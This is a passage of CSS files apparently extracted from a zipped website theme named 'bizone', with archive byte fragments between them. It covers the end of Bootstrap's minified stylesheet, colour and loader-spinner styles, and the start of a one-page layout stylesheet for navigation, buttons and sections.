able-bordered>thead>tr>th:last-child,.panel>.table-responsive>.table-bordered>tbody>tr>td:last-child,.panel>.table-responsive>.table-bordered>tbody>tr>th:last-child,.panel>.table-responsive>.table-bordered>tfoot>tr>td:last-child,.panel>.table-responsive>.table-bordered>tfoot>tr>th:last-child,.panel>.table-responsive>.table-bordered>thead>tr>td:last-child,.panel>.table-responsive>.table-bordered>thead>tr>th:last-child{border-right:0}.panel>.table-bordered>tbody>tr:first-child>td,.panel>.table-bordered>tbody>tr:first-child>th,.panel>.table-bordered>thead>tr:first-child>td,.panel>.table-bordered>thead>tr:first-child>th,.panel>.table-responsive>.table-bordered>tbody>tr:first-child>td,.panel>.table-responsive>.table-bordered>tbody>tr:first-child>th,.panel>.table-responsive>.table-bordered>thead>tr:first-child>td,.panel>.table-responsive>.table-bordered>thead>tr:first-child>th{border-bottom:0}.panel>.table-bordered>tbody>tr:last-child>td,.panel>.table-bordered>tbody>tr:last-child>th,.panel>.table-bordered>tfoot>tr:last-child>td,.panel>.table-bordered>tfoot>tr:last-child>th,.panel>.table-responsive>.table-bordered>tbody>tr:last-child>td,.panel>.table-responsive>.table-bordered>tbody>tr:last-child>th,.panel>.table-responsive>.table-bordered>tfoot>tr:last-child>td,.panel>.table-responsive>.table-bordered>tfoot>tr:last-child>th{border-bottom:0}.panel>.table-responsive{margin-bottom:0;border:0}.panel-group{margin-bottom:20px}.panel-group .panel{margin-bottom:0;border-radius:4px}.panel-group .panel+.panel{margin-top:5px}.panel-group .panel-heading{border-bottom:0}.panel-group .panel-heading+.panel-collapse>.list-group,.panel-group .panel-heading+.panel-collapse>.panel-body{border-top:1px solid #ddd}.panel-group .panel-footer{border-top:0}.panel-group .panel-footer+.panel-collapse .panel-body{border-bottom:1px solid #ddd}.panel-default{border-color:#ddd}.panel-default>.panel-heading{color:#333;background-color:#f5f5f5;border-color:#ddd}.panel-default>.panel-heading+.panel-collapse>.panel-body{border-top-color:#ddd}.panel-default>.panel-heading .badge{color:#f5f5f5;background-color:#333}.panel-default>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#ddd}.panel-primary{border-color:#337ab7}.panel-primary>.panel-heading{color:#fff;background-color:#337ab7;border-color:#337ab7}.panel-primary>.panel-heading+.panel-collapse>.panel-body{border-top-color:#337ab7}.panel-primary>.panel-heading .badge{color:#337ab7;background-color:#fff}.panel-primary>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#337ab7}.panel-success{border-color:#d6e9c6}.panel-success>.panel-heading{color:#3c763d;background-color:#dff0d8;border-color:#d6e9c6}.panel-success>.panel-heading+.panel-collapse>.panel-body{border-top-color:#d6e9c6}.panel-success>.panel-heading .badge{color:#dff0d8;background-color:#3c763d}.panel-success>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#d6e9c6}.panel-info{border-color:#bce8f1}.panel-info>.panel-heading{color:#31708f;background-color:#d9edf7;border-color:#bce8f1}.panel-info>.panel-heading+.panel-collapse>.panel-body{border-top-color:#bce8f1}.panel-info>.panel-heading .badge{color:#d9edf7;background-color:#31708f}.panel-info>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#bce8f1}.panel-warning{border-color:#faebcc}.panel-warning>.panel-heading{color:#8a6d3b;background-color:#fcf8e3;border-color:#faebcc}.panel-warning>.panel-heading+.panel-collapse>.panel-body{border-top-color:#faebcc}.panel-warning>.panel-heading .badge{color:#fcf8e3;background-color:#8a6d3b}.panel-warning>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#faebcc}.panel-danger{border-color:#ebccd1}.panel-danger>.panel-heading{color:#a94442;background-color:#f2dede;border-color:#ebccd1}.panel-danger>.panel-heading+.panel-collapse>.panel-body{border-top-color:#ebccd1}.panel-danger>.panel-heading .badge{color:#f2dede;background-color:#a94442}.panel-danger>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#ebccd1}.embed-responsive{position:relative;display:block;height:0;padding:0;overflow:hidden}.embed-responsive .embed-responsive-item,.embed-responsive embed,.embed-responsive iframe,.embed-responsive object,.embed-responsive video{position:absolute;top:0;bottom:0;left:0;width:100%;height:100%;border:0}.embed-responsive-16by9{padding-bottom:56.25%}.embed-responsive-4by3{padding-bottom:75%}.well{min-height:20px;padding:19px;margin-bottom:20px;background-color:#f5f5f5;border:1px solid #e3e3e3;border-radius:4px;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.05);box-shadow:inset 0 1px 1px rgba(0,0,0,.05)}.well blockquote{border-color:#ddd;border-color:rgba(0,0,0,.15)}.well-lg{padding:24px;border-radius:6px}.well-sm{padding:9px;border-radius:3px}.close{float:right;font-size:21px;font-weight:700;line-height:1;color:#000;text-shadow:0 1px 0 #fff;filter:alpha(opacity=20);opacity:.2}.close:focus,.close:hover{color:#000;text-decoration:none;cursor:pointer;filter:alpha(opacity=50);opacity:.5}button.close{-webkit-appearance:none;padding:0;cursor:pointer;background:0 0;border:0}.modal-open{overflow:hidden}.modal{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1050;display:none;overflow:hidden;-webkit-overflow-scrolling:touch;outline:0}.modal.fade .modal-dialog{-webkit-transition:-webkit-transform .3s ease-out;-o-transition:-o-transform .3s ease-out;transition:transform .3s ease-out;-webkit-transform:translate(0,-25%);-ms-transform:translate(0,-25%);-o-transform:translate(0,-25%);transform:translate(0,-25%)}.modal.in .modal-dialog{-webkit-transform:translate(0,0);-ms-transform:translate(0,0);-o-transform:translate(0,0);transform:translate(0,0)}.modal-open .modal{overflow-x:hidden;overflow-y:auto}.modal-dialog{position:relative;width:auto;margin:10px}.modal-content{position:relative;background-color:#fff;-webkit-background-clip:padding-box;background-clip:padding-box;border:1px solid #999;border:1px solid rgba(0,0,0,.2);border-radius:6px;outline:0;-webkit-box-shadow:0 3px 9px rgba(0,0,0,.5);box-shadow:0 3px 9px rgba(0,0,0,.5)}.modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;background-color:#000}.modal-backdrop.fade{filter:alpha(opacity=0);opacity:0}.modal-backdrop.in{filter:alpha(opacity=50);opacity:.5}.modal-header{padding:15px;border-bottom:1px solid #e5e5e5}.modal-header .close{margin-top:-2px}.modal-title{margin:0;line-height:1.42857143}.modal-body{position:relative;padding:15px}.modal-footer{padding:15px;text-align:right;border-top:1px solid #e5e5e5}.modal-footer .btn+.btn{margin-bottom:0;margin-left:5px}.modal-footer .btn-group .btn+.btn{margin-left:-1px}.modal-footer .btn-block+.btn-block{margin-left:0}.modal-scrollbar-measure{position:absolute;top:-9999px;width:50px;height:50px;overflow:scroll}@media (min-width:768px){.modal-dialog{width:600px;margin:30px auto}.modal-content{-webkit-box-shadow:0 5px 15px rgba(0,0,0,.5);box-shadow:0 5px 15px rgba(0,0,0,.5)}.modal-sm{width:300px}}@media (min-width:992px){.modal-lg{width:900px}}.tooltip{position:absolute;z-index:1070;display:block;font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:12px;font-style:normal;font-weight:400;line-height:1.42857143;text-align:left;text-align:start;text-decoration:none;text-shadow:none;text-transform:none;letter-spacing:normal;word-break:normal;word-spacing:normal;word-wrap:normal;white-space:normal;filter:alpha(opacity=0);opacity:0;line-break:auto}.tooltip.in{filter:alpha(opacity=90);opacity:.9}.tooltip.top{padding:5px 0;margin-top:-3px}.tooltip.right{padding:0 5px;margin-left:3px}.tooltip.bottom{padding:5px 0;margin-top:3px}.tooltip.left{padding:0 5px;margin-left:-3px}.tooltip-inner{max-width:200px;padding:3px 8px;color:#fff;text-align:center;background-color:#000;border-radius:4px}.tooltip-arrow{position:absolute;width:0;height:0;border-color:transparent;border-style:solid}.tooltip.top .tooltip-arrow{bottom:0;left:50%;margin-left:-5px;border-width:5px 5px 0;border-top-color:#000}.tooltip.top-left .tooltip-arrow{right:5px;bottom:0;margin-bottom:-5px;border-width:5px 5px 0;border-top-color:#000}.tooltip.top-right .tooltip-arrow{bottom:0;left:5px;margin-bottom:-5px;border-width:5px 5px 0;border-top-color:#000}.tooltip.right .tooltip-arrow{top:50%;left:0;margin-top:-5px;border-width:5px 5px 5px 0;border-right-color:#000}.tooltip.left .tooltip-arrow{top:50%;right:0;margin-top:-5px;border-width:5px 0 5px 5px;border-left-color:#000}.tooltip.bottom .tooltip-arrow{top:0;left:50%;margin-left:-5px;border-width:0 5px 5px;border-bottom-color:#000}.tooltip.bottom-left .tooltip-arrow{top:0;right:5px;margin-top:-5px;border-width:0 5px 5px;border-bottom-color:#000}.tooltip.bottom-right .tooltip-arrow{top:0;left:5px;margin-top:-5px;border-width:0 5px 5px;border-bottom-color:#000}.popover{position:absolute;top:0;left:0;z-index:1060;display:none;max-width:276px;padding:1px;font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;font-style:normal;font-weight:400;line-height:1.42857143;text-align:left;text-align:start;text-decoration:none;text-shadow:none;text-transform:none;letter-spacing:normal;word-break:normal;word-spacing:normal;word-wrap:normal;white-space:normal;background-color:#fff;-webkit-background-clip:padding-box;background-clip:padding-box;border:1px solid #ccc;border:1px solid rgba(0,0,0,.2);border-radius:6px;-webkit-box-shadow:0 5px 10px rgba(0,0,0,.2);box-shadow:0 5px 10px rgba(0,0,0,.2);line-break:auto}.popover.top{margin-top:-10px}.popover.right{margin-left:10px}.popover.bottom{margin-top:10px}.popover.left{margin-left:-10px}.popover-title{padding:8px 14px;margin:0;font-size:14px;background-color:#f7f7f7;border-bottom:1px solid #ebebeb;border-radius:5px 5px 0 0}.popover-content{padding:9px 14px}.popover>.arrow,.popover>.arrow:after{position:absolute;display:block;width:0;height:0;border-color:transparent;border-style:solid}.popover>.arrow{border-width:11px}.popover>.arrow:after{content:"";border-width:10px}.popover.top>.arrow{bottom:-11px;left:50%;margin-left:-11px;border-top-color:#999;border-top-color:rgba(0,0,0,.25);border-bottom-width:0}.popover.top>.arrow:after{bottom:1px;margin-left:-10px;content:" ";border-top-color:#fff;border-bottom-width:0}.popover.right>.arrow{top:50%;left:-11px;margin-top:-11px;border-right-color:#999;border-right-color:rgba(0,0,0,.25);border-left-width:0}.popover.right>.arrow:after{bottom:-10px;left:1px;content:" ";border-right-color:#fff;border-left-width:0}.popover.bottom>.arrow{top:-11px;left:50%;margin-left:-11px;border-top-width:0;border-bottom-color:#999;border-bottom-color:rgba(0,0,0,.25)}.popover.bottom>.arrow:after{top:1px;margin-left:-10px;content:" ";border-top-width:0;border-bottom-color:#fff}.popover.left>.arrow{top:50%;right:-11px;margin-top:-11px;border-right-width:0;border-left-color:#999;border-left-color:rgba(0,0,0,.25)}.popover.left>.arrow:after{right:1px;bottom:-10px;content:" ";border-right-width:0;border-left-color:#fff}.carousel{position:relative}.carousel-inner{position:relative;width:100%;overflow:hidden}.carousel-inner>.item{position:relative;display:none;-webkit-transition:.6s ease-in-out left;-o-transition:.6s ease-in-out left;transition:.6s ease-in-out left}.carousel-inner>.item>a>img,.carousel-inner>.item>img{line-height:1}@media all and (transform-3d),(-webkit-transform-3d){.carousel-inner>.item{-webkit-transition:-webkit-transform .6s ease-in-out;-o-transition:-o-transform .6s ease-in-out;transition:transform .6s ease-in-out;-webkit-backface-visibility:hidden;backface-visibility:hidden;-webkit-perspective:1000px;perspective:1000px}.carousel-inner>.item.active.right,.carousel-inner>.item.next{left:0;-webkit-transform:translate3d(100%,0,0);transform:translate3d(100%,0,0)}.carousel-inner>.item.active.left,.carousel-inner>.item.prev{left:0;-webkit-transform:translate3d(-100%,0,0);transform:translate3d(-100%,0,0)}.carousel-inner>.item.active,.carousel-inner>.item.next.left,.carousel-inner>.item.prev.right{left:0;-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}}.carousel-inner>.active,.carousel-inner>.next,.carousel-inner>.prev{display:block}.carousel-inner>.active{left:0}.carousel-inner>.next,.carousel-inner>.prev{position:absolute;top:0;width:100%}.carousel-inner>.next{left:100%}.carousel-inner>.prev{left:-100%}.carousel-inner>.next.left,.carousel-inner>.prev.right{left:0}.carousel-inner>.active.left{left:-100%}.carousel-inner>.active.right{left:100%}.carousel-control{position:absolute;top:0;bottom:0;left:0;width:15%;font-size:20px;color:#fff;text-align:center;text-shadow:0 1px 2px rgba(0,0,0,.6);background-color:rgba(0,0,0,0);filter:alpha(opacity=50);opacity:.5}.carousel-control.left{background-image:-webkit-linear-gradient(left,rgba(0,0,0,.5) 0,rgba(0,0,0,.0001) 100%);background-image:-o-linear-gradient(left,rgba(0,0,0,.5) 0,rgba(0,0,0,.0001) 100%);background-image:-webkit-gradient(linear,left top,right top,from(rgba(0,0,0,.5)),to(rgba(0,0,0,.0001)));background-image:linear-gradient(to right,rgba(0,0,0,.5) 0,rgba(0,0,0,.0001) 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1);background-repeat:repeat-x}.carousel-control.right{right:0;left:auto;background-image:-webkit-linear-gradient(left,rgba(0,0,0,.0001) 0,rgba(0,0,0,.5) 100%);background-image:-o-linear-gradient(left,rgba(0,0,0,.0001) 0,rgba(0,0,0,.5) 100%);background-image:-webkit-gradient(linear,left top,right top,from(rgba(0,0,0,.0001)),to(rgba(0,0,0,.5)));background-image:linear-gradient(to right,rgba(0,0,0,.0001) 0,rgba(0,0,0,.5) 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1);background-repeat:repeat-x}.carousel-control:focus,.carousel-control:hover{color:#fff;text-decoration:none;filter:alpha(opacity=90);outline:0;opacity:.9}.carousel-control .glyphicon-chevron-left,.carousel-control .glyphicon-chevron-right,.carousel-control .icon-next,.carousel-control .icon-prev{position:absolute;top:50%;z-index:5;display:inline-block;margin-top:-10px}.carousel-control .glyphicon-chevron-left,.carousel-control .icon-prev{left:50%;margin-left:-10px}.carousel-control .glyphicon-chevron-right,.carousel-control .icon-next{right:50%;margin-right:-10px}.carousel-control .icon-next,.carousel-control .icon-prev{width:20px;height:20px;font-family:serif;line-height:1}.carousel-control .icon-prev:before{content:'\2039'}.carousel-control .icon-next:before{content:'\203a'}.carousel-indicators{position:absolute;bottom:10px;left:50%;z-index:15;width:60%;padding-left:0;margin-left:-30%;text-align:center;list-style:none}.carousel-indicators li{display:inline-block;width:10px;height:10px;margin:1px;text-indent:-999px;cursor:pointer;background-color:#000\9;background-color:rgba(0,0,0,0);border:1px solid #fff;border-radius:10px}.carousel-indicators .active{width:12px;height:12px;margin:0;background-color:#fff}.carousel-caption{position:absolute;right:15%;bottom:20px;left:15%;z-index:10;padding-top:20px;padding-bottom:20px;color:#fff;text-align:center;text-shadow:0 1px 2px rgba(0,0,0,.6)}.carousel-caption .btn{text-shadow:none}@media screen and (min-width:768px){.carousel-control .glyphicon-chevron-left,.carousel-control .glyphicon-chevron-right,.carousel-control .icon-next,.carousel-control .icon-prev{width:30px;height:30px;margin-top:-10px;font-size:30px}.carousel-control .glyphicon-chevron-left,.carousel-control .icon-prev{margin-left:-10px}.carousel-control .glyphicon-chevron-right,.carousel-control .icon-next{margin-right:-10px}.carousel-caption{right:20%;left:20%;padding-bottom:30px}.carousel-indicators{bottom:20px}}.btn-group-vertical>.btn-group:after,.btn-group-vertical>.btn-group:before,.btn-toolbar:after,.btn-toolbar:before,.clearfix:after,.clearfix:before,.container-fluid:after,.container-fluid:before,.container:after,.container:before,.dl-horizontal dd:after,.dl-horizontal dd:before,.form-horizontal .form-group:after,.form-horizontal .form-group:before,.modal-footer:after,.modal-footer:before,.modal-header:after,.modal-header:before,.nav:after,.nav:before,.navbar-collapse:after,.navbar-collapse:before,.navbar-header:after,.navbar-header:before,.navbar:after,.navbar:before,.pager:after,.pager:before,.panel-body:after,.panel-body:before,.row:after,.row:before{display:table;content:" "}.btn-group-vertical>.btn-group:after,.btn-toolbar:after,.clearfix:after,.container-fluid:after,.container:after,.dl-horizontal dd:after,.form-horizontal .form-group:after,.modal-footer:after,.modal-header:after,.nav:after,.navbar-collapse:after,.navbar-header:after,.navbar:after,.pager:after,.panel-body:after,.row:after{clear:both}.center-block{display:block;margin-right:auto;margin-left:auto}.pull-right{float:right!important}.pull-left{float:left!important}.hide{display:none!important}.show{display:block!important}.invisible{visibility:hidden}.text-hide{font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0}.hidden{display:none!important}.affix{position:fixed}@-ms-viewport{width:device-width}.visible-lg,.visible-md,.visible-sm,.visible-xs{display:none!important}.visible-lg-block,.visible-lg-inline,.visible-lg-inline-block,.visible-md-block,.visible-md-inline,.visible-md-inline-block,.visible-sm-block,.visible-sm-inline,.visible-sm-inline-block,.visible-xs-block,.visible-xs-inline,.visible-xs-inline-block{display:none!important}@media (max-width:767px){.visible-xs{display:block!important}table.visible-xs{display:table!important}tr.visible-xs{display:table-row!important}td.visible-xs,th.visible-xs{display:table-cell!important}}@media (max-width:767px){.visible-xs-block{display:block!important}}@media (max-width:767px){.visible-xs-inline{display:inline!important}}@media (max-width:767px){.visible-xs-inline-block{display:inline-block!important}}@media (min-width:768px) and (max-width:991px){.visible-sm{display:block!important}table.visible-sm{display:table!important}tr.visible-sm{display:table-row!important}td.visible-sm,th.visible-sm{display:table-cell!important}}@media (min-width:768px) and (max-width:991px){.visible-sm-block{display:block!important}}@media (min-width:768px) and (max-width:991px){.visible-sm-inline{display:inline!important}}@media (min-width:768px) and (max-width:991px){.visible-sm-inline-block{display:inline-block!important}}@media (min-width:992px) and (max-width:1199px){.visible-md{display:block!important}table.visible-md{display:table!important}tr.visible-md{display:table-row!important}td.visible-md,th.visible-md{display:table-cell!important}}@media (min-width:992px) and (max-width:1199px){.visible-md-block{display:block!important}}@media (min-width:992px) and (max-width:1199px){.visible-md-inline{display:inline!important}}@media (min-width:992px) and (max-width:1199px){.visible-md-inline-block{display:inline-block!important}}@media (min-width:1200px){.visible-lg{display:block!important}table.visible-lg{display:table!important}tr.visible-lg{display:table-row!important}td.visible-lg,th.visible-lg{display:table-cell!important}}@media (min-width:1200px){.visible-lg-block{display:block!important}}@media (min-width:1200px){.visible-lg-inline{display:inline!important}}@media (min-width:1200px){.visible-lg-inline-block{display:inline-block!important}}@media (max-width:767px){.hidden-xs{display:none!important}}@media (min-width:768px) and (max-width:991px){.hidden-sm{display:none!important}}@media (min-width:992px) and (max-width:1199px){.hidden-md{display:none!important}}@media (min-width:1200px){.hidden-lg{display:none!important}}.visible-print{display:none!important}@media print{.visible-print{display:block!important}table.visible-print{display:table!important}tr.visible-print{display:table-row!important}td.visible-print,th.visible-print{display:table-cell!important}}.visible-print-block{display:none!important}@media print{.visible-print-block{display:block!important}}.visible-print-inline{display:none!important}@media print{.visible-print-inline{display:inline!important}}.visible-print-inline-block{display:none!important}@media print{.visible-print-inline-block{display:inline-block!important}}@media print{.hidden-print{display:none!important}}
/*# sourceMappingURL=bootstrap.min.css.map */PK!`��#��bizone/css/one-color.cssnu&1i� @charset "utf-8";
/* CSS Document */

.green {
	background:#82b440;
	}
.green_light {
	background: rgba(130, 180, 64, 0.65);
	}
.blue{
	background:#07aaa5;
	} 
.dark_gray {
	background:#969696;
	}
.we-do .do-wrap a{
	color:#969696;
}

.we-do .do-wrap a:hover{
	color:#07aaa5;
}
.we-do .do-wrap:hover .top, we-do .do-wrap:focus .top, .we-do .do-wrap:hover span, .we-do .do-wrap:focus span{
	background:#07aaa5;
}

.pricing_item.dark_gray {
    border-color: #969696;
}

.pricing_item.dark_gray .pricing_action{
    background: #969696;
}


.pricing_item.dark_gray:hover .pricing_action{
	border:1px solid transparent;
	background:#07AAA5 !important;
}


	PK!^$��bizone/css/loader-colorful.cssnu&1i�.loader{
	position: fixed;
	background:#fff;
	z-index:11000;
	height:100%;
	width:100%;
	overflow:hidden;
}


.spinner {
  
   margin: auto;
  width: 70px;
  height: 40px;
  position: relative;
  text-align: center;
  position:absolute;
  left:50%;
  right:50%;
  margin-left:-20px;
  top:50%;
  
  -webkit-animation: sk-rotate 2.0s infinite linear;
  animation: sk-rotate 2.0s infinite linear;

}

.spinner > div {
  width: 18px;
  height: 18px;
  background-color: #333;

  border-radius: 100%;
  display: inline-block;
  -webkit-animation: sk-bouncedelay 1.4s infinite ease-in-out both;
  animation: sk-bouncedelay 1.4s infinite ease-in-out both;
}

.spinner .bounce1 {
  -webkit-animation-delay: -0.32s;
  animation-delay: -0.32s;
  background-color: #82B440;
}

.spinner .bounce2 {
  -webkit-animation-delay: -0.16s;
  animation-delay: -0.16s;
  background-color: #07AAA5;
}

.spinner .bounce3 {
  background-color: #EC768C;
}

@-webkit-keyframes sk-bouncedelay {
  0%, 80%, 100% { -webkit-transform: scale(0) }
  40% { -webkit-transform: scale(1.0) }
}

@keyframes sk-bouncedelay {
  0%, 80%, 100% { 
    -webkit-transform: scale(0);
    transform: scale(0);
  } 40% { 
    -webkit-transform: scale(1.0);
    transform: scale(1.0);
  }
}PK!:@>�ǸǸbizone/css/onepage_old2.cssnu&1i� @charset "utf-8";
/* CSS Document 

Table Of Content

+General Styling and Tags
*body
+ @font-face

+ Header

+ #main-navigation
-.navigation
	- .navbar-nav
		- .page-scroll

+- #main-slider

+ #about
	-.canvas-box

+ #bg-paralax

+ #facts
	-.number-counters
		-.counters-item 
		
+ #responsive
	-.responsive-pic
	-.r-test
		-.r-feature
			-.screens

+ #experties
	-.myStat2
	-.circliful
		-.circle-text
			-canvas

+ .we-do
	-.do-wrap

+ #thinkers
	-.thinker-wrap
		-.social-contact
	
+ #project
   - .work-filter 
	- .work-item
		- .overlay
			- .overlay-inner


+ #pricing
	-.pricing 
	-.pricing_tenzin
		-.pricing_item 
			-.pricing_title
			-.pricing_price
			-.pricing_sentence
			-.pricing_list
			-.pricing_action

			
+ #testinomial
	-#testinomial-slider
	-.owl-carousel
		.item

+ #publication
	-#publication-slider
	-.owl-carousel
		.item
		
+ #contact
	-#letstalk

+ ##area-main
	-.blog-wrap
		-.blog-content
			-.blog-item
		

+ footer
	-.breadcrumb

*/






/****** General Styling ******/
body{
	 color:#222222;
    font-family: "Open Sans", sans-serif;
	 overflow-x: hidden;
	 font-size:14px;
	 
}
ul , ol{
	margin:0;
	padding:0;
	list-style:none;
}
a ,
a:hover , 
a:focus{
	text-decoration:none;
	outline:none;
	color:inherit;
}
input[type="submit"]{
	background-color:transparent;
}	
button:focus {
    outline: medium none;
}
h1,
h2, 
h3, 
h4, 
#testinomial-slider .item h5{
	margin:0;
}
h1{
	font-size:46px;
}
h2, 
h3,
h4{
	text-transform:capitalize;
	font-family: "raleway";
}

h2{
	font-size:44px;
}
h3{
	font-size:24px;
	font-weight: 600;
}

h4{
	font-size:18px;
	text-transform: capitalize;
    font-weight: 600;
}
p{
	font-size:14px;
	color:#222222;
}
textarea{
	resize:none;
}
p.title{
	font-size:14px;
	text-transform:capitalize;
}
.heading{
	margin-bottom:40px;
}
.padding{
	padding:90px 0;
}
.top-padding{
	padding-top:90px;
}
.bottom-padding{
	padding-bottom: 90px;
}
.box-section.nopadding .bt-boxfluid,
.container-fluid.nopadding{
	padding-left: 0;
	padding-right: 0;
}
.section-padding{
	padding-top:130px!important;
}
#about.section-padding{
	padding-top:170px!important;	
}
.padding-botom{
	padding-bottom:90px;
}
.magin30{
	margin-bottom:30px;
}
.dark{
	background:#1b1d1f;
}
.light{
	background:#f5f5f5;
}
.base_color{
	background:#82b440;
}

.green{
	background:#74c8b8;
}

.pink{
	background:#ec768c;
}

.purple{
	background:#c183d6;
}

.blue{
	background:#31aae1;
}

.green-text{
	color:#74c8b8;
}
.pink-text{
	color:#ec768c;
}
.purple-text{
	color:#c183d6;
}

.blue-text{
	color:#31aae1;
}

.bg-grey{
	background:#ececec;
}

/*Buttons*/
.btn-common{
	border:1px solid #fff;
	color:#fff;
}

.btn-black{
	border:1px solid #000;
	color:#000;
}
.btn-green{
	background:#82B440;
	border:1px solid transparent;
}	
.btn-blue{
	background:#07AAA5;
	border:1px solid transparent;
}
.btn-pink{
	background:#ec768c;
	border:1px solid transparent;
}
.btn-common,
.btn-black,
.btn-white,
.loadmore{
	font-size:15px;
	font-weight:bold;
	text-transform:capitalize;
	display:inline-block;
	padding:12px 30px;
}
.btn-white{
	background:#fff;
	color:#000;
	border:1px solid transparent;
}
a.readmore{
	font-size:13px;
	font-weight:bold;
	text-decoration:underline;
	display:inline-block;
	text-transform:uppercase;
}
a.readmore:hover, a.readmore:focus{
	color:#82b440;
}
.loadmore{
	color:#222222;
	margin-top:40px;
	position:relative;
	-webkit-transition: color 0.3s ease 0s;
	-ms-transition: color 0.3s ease 0s;
	-o-transition: color 0.3s ease 0s;
	transition: color 0.3s ease 0s;
}
.loadmore:hover{
	color:#82b440;
}
.loadmore::before {
  color: transparent;
  content: "•";
  font-size: 1.2em;
  left:95%;
  pointer-events: none;
  position: absolute;
  text-shadow: 0 0 transparent;
  top:25%;
  transform: translateX(-50%);
  transition: text-shadow 0.3s ease 0s, color 0.3s ease 0s;
}
.loadmore:hover::before, .loadmore:focus::before {
  color: #82b440;
  text-shadow: 10px 0 #82b440, -10px 0 #82b440;
}

/* Bounce To Top */
.bounce-top,
.bounce-green,
.bounce-white, 
.bounce-pink{
  display: inline-block;
  vertical-align: middle;
  -webkit-transform: translateZ(0);
  transform: translateZ(0);
  box-shadow: 0 0 1px rgba(0, 0, 0, 0);
  -webkit-backface-visibility: hidden;
  backface-visibility: hidden;
  -moz-osx-font-smoothing: grayscale;
  position: relative;
  -webkit-transition-property: color;
  transition-property: color;
  -webkit-transition-duration: 0.5s;
  transition-duration: 0.5s;
}
.bounce-pink:before{
	background:#EC768C !important;
}
.bounce-top:before{
	background: #07AAA5;
	
}
.bounce-green:before{
	background:#82B440;
}
.bounce-white:before{
	background: #fff;
}	
.bounce-top:before,
.bounce-green:before,
.bounce-white:before,
.bounce-pink:before{
  content: "";
  position: absolute;
  z-index: -1;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  -webkit-transform: scaleY(0);
  transform: scaleY(0);
  -webkit-transform-origin: 50% 100%;
  transform-origin: 50% 100%;
  -webkit-transition-property: transform;
  transition-property: transform;
  -webkit-transition-duration: 0.5s;
  transition-duration: 0.5s;
  -webkit-transition-timing-function: ease-out;
  transition-timing-function: ease-out;
}
.bounce-top:hover, .bounce-top:focus{
   color: #fff!important;
   border:1px solid #07AAA5;
}
.bounce-pink:hover, .bounce-pink:focus{
   color: #fff !important;
   border:1px solid #EC768C !important;
}
.bounce-green:hover, .bounce-green:focus{
   color: #fff;
   border:1px solid #82B440;
}
.bounce-white:hover, .bounce-white:focus{
	color:#1b1d1f !important;
	border:1px solid #fff;
}	
.bounce-top:hover:before, .bounce-top:focus:before, 
.bounce-green:hover::before, .bounce-green:focus::before,
.bounce-white:hover::before, .bounce-white:focus::before,
.bounce-pink:hover::before, .bounce-pink:focus::before{
  -webkit-transform: scaleY(1);
  transform: scaleY(1);
  -webkit-transition-timing-function: cubic-bezier(0.52, 1.64, 0.37, 0.66);
  transition-timing-function: cubic-bezier(0.52, 1.64, 0.37, 0.66);
}


/*Section with image*/
.info-section {
	overflow:hidden;
}
.info-section .row {
    margin: 0;
}

.info-section .block {
    position: relative;
}
.info-section ul.social-media{
}

.info-section ul.social-media li{
	display:inline-block;
}

.info-section ul.social-media li a{
	color:#1b1d1f;
	font-size:20px;
	margin-right:10px;
	display:block;
	margin-top:25px;
}
.info-section ul.social-media li a:hover,.info-section ul.social-media li a:focus{
	color:#82b440
}

.info-section .bg {
    background-size: cover;
	 background-position: center center;
    bottom: 0;
    left: 0;
    position:relative;
    right: 0;
    top: 0;
	 padding-top:75%;
	 margin:0 -15px;
}

.info-section .block {
	padding-top:0;
	padding:90px 5%;
}
.info-section .block .center {
  height:100%;
}


/*Header Starts*/
a, #navigation.affix .navbar-default .navbar-nav > li > a,
#main-navigation, #navigation.affix, .navbar-brand,
#navigation.affix .navbar-default .navbar-nav > li > a,
.push_nav li a,
ul.top-right li a:hover,
#about .canvas-box span i, #about .canvas-box h4,
#about .canvas-box:hover span i,
.we-do .do-wrap i, .we-do .do-wrap:hover i,
.counters-item i, .counters-item:hover i,
.thinker-image .overlay,
.work-filter ul li a,
.main-button, .main-button > button span, .overlay,
.we-do .do-wrap:hover .top, .we-do .do-wrap:hover span,
#paralax-slider .owl-controls .owl-page span{
	-webkit-transition: all .3s ease;
   -moz-transition: all .3s ease;
	-ms-transition: all .3s ease;
   -o-transition:all .3s ease;
	transition:all .3s ease;
}	
#main-navigation {
  position: absolute;
 
}
#navigation.affix {
  background-color: #fff;
  position: fixed;
  -webkit-box-shadow:0 2px 10px -1px rgba(87, 97, 100, 0.35);
  -moz-box-shadow:0 2px 10px -1px rgba(87, 97, 100, 0.35);
   box-shadow: 0 2px 10px -1px rgba(87, 97, 100, 0.35);

}
#main-navigation, #navigation.affix{
	top: 0;
	z-index:999;
	width: 100%;

}	
.navbar-default {
  background-color: transparent;
  border-color: transparent;
}
.navbar , .navbar-default{
	  border:none;
}
.navbar {
  margin-bottom: 0;
  min-height: auto;
}
 .navbar-collapse {
   overflow-x: visible !important;
}
.navbar-collapse.in {
  overflow-y: auto !important;
  height: auto !important;
}
.navbar-brand {
  height: auto;
  padding:29px 0;
  float:none;
  display:block;
  width:150px;
}
#navigation.affix .navbar-brand {
  padding: 16px 0;
  width: 134px;
}
.navbar-default .navbar-nav > li{
	 margin:0 20px;
}
.navbar-default .navbar-nav > li > a {
  color: #229aff;
  font-size:12px;
  font-weight:600;
  letter-spacing:1px;
  text-transform:uppercase;
  padding:37px 0 15px 0;
  border-bottom:3px solid transparent;
}
#navigation.affix .navbar-default .navbar-nav > li > a{
	color: #222;
	padding:22px 0;
		
}
.navbar-default .navbar-nav > li > a:hover,
#navigation.affix .navbar-default .navbar-nav > li > a:hover{
	color:#07AAA5;
	background-color:transparent;
}
